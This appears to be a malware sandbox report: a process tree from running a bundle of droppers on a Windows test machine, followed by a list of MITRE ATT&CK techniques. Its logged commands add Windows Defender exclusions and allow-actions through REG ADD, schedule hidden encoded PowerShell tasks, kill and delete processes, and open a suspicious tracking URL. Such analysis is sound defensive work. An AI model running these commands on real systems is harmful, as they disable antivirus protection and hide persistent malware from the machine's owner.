        "C:\Users\Admin\AppData\Local\Temp\sceu0aipidr\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:8372
        
        C:\Users\Admin\AppData\Local\Temp\is-VUPD6.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VUPD6.tmp\vict.tmp" /SL5="$205BA,870426,780800,C:\Users\Admin\AppData\Local\Temp\sceu0aipidr\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\hvuyeui1zf0\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hvuyeui1zf0\AwesomePoolU1.exe"
        13⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\1w4kzlamqya\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1w4kzlamqya\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:8636
        
        C:\Users\Admin\AppData\Local\Temp\6QD8ATWWF3\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6QD8ATWWF3\setups.exe" ll
        10⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\is-BRRIB.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BRRIB.tmp\setups.tmp" /SL5="$110202,383902,148480,C:\Users\Admin\AppData\Local\Temp\6QD8ATWWF3\setups.exe" ll
        11⤵
        
        PID:1184
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        9⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        10⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        11⤵
        Kills process with taskkill
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        9⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Roaming\DD2A.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\DD2A.tmp.exe"
        10⤵
        
        PID:736
        
        C:\Users\Admin\AppData\Roaming\DD2A.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\DD2A.tmp.exe"
        11⤵
        
        PID:9080
        
        C:\Users\Admin\AppData\Roaming\63E.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\63E.tmp.exe"
        10⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        9⤵
        
        PID:8164
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ynax5jlg.gul\setup.exe /S /kr /site_id=754 & exit
        7⤵
        
        PID:8856
        
        C:\Users\Admin\AppData\Local\Temp\ynax5jlg.gul\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\ynax5jlg.gul\setup.exe /S /kr /site_id=754
        8⤵
        
        PID:8612
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        9⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        10⤵
        
        PID:6568
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        11⤵
        
        PID:6344
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        11⤵
        
        PID:7556
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gagziXarK" /SC once /ST 02:34:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        9⤵
        Creates scheduled task(s)
        
        PID:7144
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gagziXarK"
        9⤵
        
        PID:5656
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gagziXarK"
        9⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 19:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\YgccYup.exe\" 9n /site_id 754 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:8284
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gzkzonzq.4cv\Four.exe & exit
        7⤵
        
        PID:8824
        
        C:\Users\Admin\AppData\Local\Temp\gzkzonzq.4cv\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\gzkzonzq.4cv\Four.exe
        8⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\ZP3IS0PSRD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZP3IS0PSRD\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        9⤵
        
        PID:8188
        
        C:\Users\Admin\AppData\Local\Temp\ZP3IS0PSRD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZP3IS0PSRD\multitimer.exe" 1 3.1616696688.605cd5706ff97 104
        10⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\ZP3IS0PSRD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZP3IS0PSRD\multitimer.exe" 2 3.1616696688.605cd5706ff97
        11⤵
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\U7UNE2B4IS\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\U7UNE2B4IS\setups.exe" ll
        9⤵
        
        PID:7120
        
        C:\Users\Admin\AppData\Local\Temp\is-6S7N0.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6S7N0.tmp\setups.tmp" /SL5="$30502,383902,148480,C:\Users\Admin\AppData\Local\Temp\U7UNE2B4IS\setups.exe" ll
        10⤵
        
        PID:1020

C:\Users\Admin\AppData\Local\Temp\is-VM5E2.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VM5E2.tmp\IBInstaller_97039.tmp" /SL5="$303D4,9884624,721408,C:\Users\Admin\AppData\Local\Temp\i5c50o0ltdm\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5812
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
  2⤵
  PID:6072
- C:\Users\Admin\AppData\Local\Temp\is-A53SV.tmp\{app}\chrome_proxy.exe
  "C:\Users\Admin\AppData\Local\Temp\is-A53SV.tmp\{app}\chrome_proxy.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6120

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4832
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 727C7C00BBA72E9F08A3DD237E9263F1 C
  2⤵
  PID:5252
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FB64A8BDDF010513EDCFBF4DE4D63255
  2⤵
  PID:6624
- C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
  2⤵
  PID:4332
- - C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
    3⤵
    PID:8332
  - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
      4⤵
      PID:8356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE119.bat" "
    3⤵
    PID:6228
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
      4⤵
      Views/modifies file attributes
      PID:8324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEFA42.bat" "
    3⤵
    PID:2944
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
      4⤵
      Views/modifies file attributes
      PID:7316

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5484

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\09873b0adfb442b88cbd9c9ecf612a61 /t 4876 /p 4768
1⤵
PID:5316

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\bf3e7f25ddc24a6e81faa5b1d3b6d1c2 /t 0 /p 5484
1⤵
PID:6236

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:2128
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{38e7282f-a2da-3f4e-b625-3d3f8587326d}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:6592
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  PID:7176

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7248

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:7240

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:8700
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:4652

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\c53a7958066b4802ad80b0b887525ecf /t 6648 /p 7860
1⤵
PID:7436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7184

C:\Users\Admin\AppData\Roaming\jgudias
C:\Users\Admin\AppData\Roaming\jgudias
1⤵
PID:7592

C:\Users\Admin\AppData\Local\Temp\1E4E.exe
C:\Users\Admin\AppData\Local\Temp\1E4E.exe
1⤵
PID:4584
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im 1E4E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1E4E.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:6916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im 1E4E.exe /f
    3⤵
    - Kills process with taskkill
    PID:2616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3052

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7404

C:\Program Files (x86)\Picture Lab\Pictures Lab.exe
"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"
1⤵
PID:6688

C:\Users\Admin\AppData\Local\Temp\6701.exe
C:\Users\Admin\AppData\Local\Temp\6701.exe
1⤵
PID:4612
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdf2\install.dll",install
  2⤵
  PID:8760

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\60b938ee698e433bbadaa8b506eb946e /t 0 /p 7404
1⤵
PID:7912

C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\YuVqfQI.exe
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\YuVqfQI.exe 9n /site_id 754 /S
1⤵
PID:8464
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5408
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4608
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8024

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery